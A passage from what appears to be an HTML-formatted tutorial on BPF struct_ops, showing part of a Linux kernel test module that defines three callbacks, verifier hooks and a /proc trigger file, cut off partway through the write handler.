&lt;p&gt;Here is the complete source code for our kernel module. It defines a &lt;code&gt;struct_ops&lt;/code&gt; named &lt;code&gt;bpf_testmod_ops&lt;/code&gt; with three distinct operations that our BPF program will later implement.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/init.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/module.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/kernel.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/btf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/btf_ids.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/proc_fs.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/seq_file.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;linux/bpf_verifier.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cm"&gt;/* Define our custom struct_ops operations */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Global instance that BPF programs will implement */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;__rcu&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Proc file to trigger the struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;proc_dir_entry&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;trigger_file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* CFI stub functions - required for struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_1&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops__test_3&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* CFI stubs structure */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops__test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* BTF and verifier callbacks */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;btf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Initialize BTF if needed */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;off&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_access_type&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_insn_access_aux&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Allow all accesses for now */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Allow specific BPF helpers to be used in struct_ops programs */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_func_proto&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="nf"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_func_id&lt;/span&gt; &lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Use base func proto which includes trace_printk and other basic helpers */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bpf_base_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf_type&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;btf_member&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;udata&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* No special member initialization needed */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Registration function */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Only one instance at a time */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmpxchg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EEXIST&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops registered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Unregistration function */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;kdata&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmpxchg&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_warn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops: unexpected unreg&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"bpf_testmod_ops unregistered&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Struct ops definition */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cfi_stubs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;__bpf_ops_bpf_testmod_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"bpf_testmod_ops"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;owner&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;THIS_MODULE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cm"&gt;/* Proc file write handler to trigger struct_ops */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;ssize_t&lt;/span&gt; &lt;span class="nf"&gt;trigger_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;__user&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;loff_t&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pos&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="n"&gt;count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;copy_from_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EFAULT&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;kbuf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;count&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;rcu_read_lock&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;rcu_dereference&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Calling struct_ops callbacks:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
            &lt;span class="n"&gt;pr_info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"test_1() returned: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ops&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
